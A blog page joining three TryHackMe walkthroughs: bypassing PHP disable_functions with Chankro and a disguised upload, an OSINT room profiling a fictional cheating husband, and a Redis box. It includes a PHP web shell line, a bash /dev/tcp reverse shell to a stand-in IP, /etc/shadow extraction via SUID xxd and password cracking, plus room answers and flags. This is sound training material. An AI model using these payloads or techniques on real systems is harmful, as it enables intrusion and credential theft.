Bypass Disable Functions

Practice bypassing disabled dangerous features that run operating system commands or start processes.

This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.

It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.


Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.

One of the easiest techniques to implement and not very widespread is to abuse the mail() and putenv() functionalities. This technique is not new, it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.



Chankro: tool to evade disable_functions and open_basedir


Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.

Install tool:

git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help



python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.




 

Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

My command run successfully, and I created a file in the directory with the output of the command.

 

First of all we will start machine of tryhackme room bypass disable function and after search room's IP what do we see there!! there is upload page where we can upload a any image and execution file via Burp Suite because we have to upload by bypassing the PHP file. 

and after uploading malicious file we have to check in which directory the file is uploaded? so for this we will use gobuster for find a directory.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.162/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
/cv.php               (Status: 200) [Size: 4153]                                  
Progress: 98580 / 441122 (22.35%) 

if you want to check which port is open in this site then you can do this with NMAP or RUSTSCAN.

  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
|   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
|   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ 
  

We got a file uploaded directory /uploads

when listing the web with the tool wappalyzer you can see that the web has as a programming language PHP

With this in we can see that the file mind phpinfo.php is available, this file gives us information about the server configuration and the settings to interpret a php for example. 

Looking at the information that gives us, phpinfo we can see a section called disable_funtions and in it many critical variables are set, such as:

    exec
    passthru
    shell_exec
    system
    proc_open
    popen
    curl_exec
    curl_multi_exec

 

As we can see that we are very limited when it comes to uploading a file php which contains malicious code for our benefit but investigating and thanks to the information provided by this machine we can make use of the tool Chankro .

This tool allows us to execute commands through the mail () and putenv () functions by changing an environment variable with which it executes the binary sendmail . An explanation of what it does is at a low level explained in this article .

To test if the tool works we are going to execute a whoami and deposit it in the absolute path of the web, which is hosted in /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/ this is known since in phpinfo you can see the path in where the web is hosted.

I will use the tool Chankro with the following paramters but before we create a c.sh file 

sudo nano c.sh

python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads. 

┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php


[+] File created!
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$     

once the malicious file is created, it creates the file for us, i will php go to the web and upload it.

and file uploading time we intercept the request and changed the content-type (image/jpeg) and write a GIF87a

What is GIF87a?

GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animationcapabilities.

check a file uploaded or not in /uploads directory

Gaining Access 

Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that when it is executed I will start a revershell to my machine on port 443:


With this in mind and already modified the file command.sh I recreate the file winsad.php with Chankro and once created I add the header 'GIF89a;' and upload the file.

Since I went back up the php and going to the path where is hosted winsad.php I can see that the code interprets me and gives me the shell : 

Start a netcat listener and click on that uploaded file-

nc -nvlp 4444

Once inside the machine we can go to the user's directory s4vi and view the flag.

www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
<ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
www-data@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
cd s4vi
www-data@ubuntu:/home/s4vi$ 
ls -la



www-data@ubuntu:/home/s4vi$ ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$ 



www-data@ubuntu:/home/s4vi$ cat flag.txt
cat cat flag.txt
cat: cat: No such file or directory
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/home/s4vi$ 

We got it!!! 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



Prerequisites:


Critical Thinking.
A love of going deep into rabbit -holes.
Basic understanding of Google.
Python 3.7+

Task 2 Story

Background Information:


You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.  TryHackMe KaffeeSec - SoMeSINT


After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 

Answer the questions below


1) Who hired you?

Ans :- ks{H}


2) Who are you investigating? (ks{firstname lastname})

Ans :- ks{thomas straussman}

Task 3 Let's get started!!

Prerequisites:

Patience, curiosity, and a passion for digging into rabbit holes.
Firefox, Chrome, or another chromium-based browser (I recommend Brave).


How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.


The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.



Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



Answer the questions below


1) What is Thomas' favorite holiday?

Ans :- Christmas

Its mentioned in the bio as X-mas or Christmas

2) What is Thomas' birth date?

Ans :- 12-20-1990

His birthday is evident from the below reddit post.

3) What is Thomas' fiancee's Twitter handle?

Ans :- @fhodgelink



 

Looking at his followers we can find the twitter handle of his finacee.

4) What is Thomas' background picture of?

Ans :- Buddha

Task 4 Spider... what?

Requirements:

    Spiderfoot
    Python 3


First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).

Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

You can access the web interface by navigating to localhost:5001 in your browser.

Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 

Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 

If you find a Twitter account that leads to shadowban.eu, click on the link.

If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.

1) What was the source module used to find these accounts?

Ans :- sfp_accounts    

2) Check the shadowban API. What is the value of "search"?

Ans :- ks{1346173539712380929}

Task 5 Connections, connections..

Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!

At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


There are a few key types of information that we want to find from socials:

Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (For IMINT/GEOMINT purposes).

Clear images of the subject's face (For reverse image searches and possibly finding more accounts/sources of info).

Clear images of the subject in a group of people (Family photos, friend groups, other information that can give context to their relationship with the group).

Personal information in their bio, or other personal data from their profile itself (Where they grew up, currently live, went to school, etc..).

Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation to specific places? All this information can help in an investigation.)


Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

What personal information can you find?

NOTE: If you get stuck on the first flag, consider two things:

• You can reverse image search landscapes / locations and most likely get a result.
• You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.

Answer the questions below


1) Where did Thomas and his fiancee vacation to?

Ans :- Koblenz, Germany

Fiancé’s Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink) Its pretty straightforward as per the below picture. The flag format is City, Country (7 letters, 7 letters)

So,it will be in the format — — — -, Germany.

Doing a reverse search of this image, indicates its Koblenz in Germany.

2) When is Francesca's Mother's birthday? (without the year)

Ans :- Decemeber 25th

We can see the Above tweet

3) What is the name of their cat?

Ans :- Gotank

https://twitter.com/FHodgelink/status/1343023195855736837

4) What show does Francesca like to watch?

Ans :- 90 Day Fiancee

One of the tweets is the below one which shares the name of the program

Task 6 Turn back the clock!!

Now that we've gathered intel from Thomas and Francesca's Twitters, lets move to another platform - Reddit.


For the sake of this investigation, we're going to be using Reddit in two different ways:

Use the old version (http://old.reddit.com/) for wayback machine purposes

Use the new version (https://www.reddit.com/) for other purposes (later on)


First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


    Get it for Firefox
    Get it for Chrome
   

Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


So it hasn't been saved yet... Nothing out of the ordinary, right?

Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?


Answer the questions below


1) What is the name of Thomas' coworker?

Ans :- Hans Minik

I got stuck at this stage. Finally did a waybackmachine to check the snapshot for 21st Dec 2020

2) Where does his coworker live?

Ans :- Nuuk, Greenland

Thomas lives in Nuuk, as per his profile

 Looking into Hans reddit profile, we can find the following posts

3) What is the paste ID for the link we found? (flag format)

Ans :- ks{ww4ju}

Hans profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

4) Password for the next link? (flag format)

Ans :- ks{1qaz2wsx}

5) What is the name of Thomas' mistress?

Ans :- Emilia Moller

Paste the password obtained in above step to the url and the name will be shown.

6) What is Thomas' Email address?

Ans :- straussmanthom@mail.com

Disclaimer

The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Res Walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge! TryHackMe Res Redis pentesting Walkthrough

Let’s start of by scanning all ports using Nmap:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
Nmap scan report for 10.10.43.113
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint: #www.kumaratuljaiswal.in #www.hackingtruth.in
OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   224.93 ms 10.8.0.1
2   225.08 ms 10.10.43.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                              
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.


Port 80: Apache Web Server:

Let’s checkout the web server on port 80:

OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.

Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

Provided by https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce

 

To start with we need to download redis-tools, so we can have access to redis-cli:

sudo apt-get install redis-tools



To start redis-tools, from the command line we enter:

redis-cli -h [IP ADDRESS]

By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command. 

 

 

 

 

From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:

 

 

In firefox we can navigate to [IP-ADDRESS]/redis.php:

 

 

We can see that redis.php does indeed run phpinfo().

Let’s try this with another php script to run commands:


<? php system($_GET['cmd']); ?>



In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 

 

 

 

Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:

 

 

 

 

 

And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.

To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.

"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:

 

To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts. 

 

 

 

 

 

And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag. 

 

 

 

 

 

 

 

 

Wait here, so basically i can't clear my terminal if in your case has been same so dont worry we are here to reloved this issue. simple type this command and you will be able to clear your terminal.

 

export TERM=xterm 

 

 

 

 The result show a binary xxd with the SUID bit set and the owner is root. We can probably exploit this to read a file with full root privileges. The go to choice fo rlinux binary exploits is GTFOBins. 

 

 

Provided by GTFOBins

 

 

 

but all we will find the file with sudo permission with this type of command 

find / -perm -u=s -type f 2>/dev/null

 

 

 

Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file as the SUID bit set. I may be possible to read the shadow file and extract the hash for user vianka and we if we can brute force the hash to get the password.

 

 

 

 

 

Using this exploit we can print out the contents of the shadow file and copy Vianka hash. If I can brute force the hash using John we can simply SU as user Vianka.

 

 

 

 

 

 

Brute Forcing Vianka’s Hash with John:

To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.

 

echo "content" > local_shadow

echo "content" > local_passwd

unshadow passwd.txt shadow.txt > hash.txt

 

 

 

 

john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

 

 

 

 

 

 

Now, we have the password for user vianka,so we can simply 'su vianka' to change user to vianka:

 

 

 

 

 

 

 

And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

 

 

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal